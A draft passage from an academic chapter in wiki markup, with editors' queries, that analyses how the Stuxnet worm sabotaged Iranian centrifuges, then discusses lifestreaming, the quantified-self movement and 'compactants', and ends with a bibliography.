&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers [Eds: does an 'and' need to be inserted here?] carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. [Eds: again, do you need to provide some examples of these important questions?] However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also [Eds: 'also' is repeated a number of times here] useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
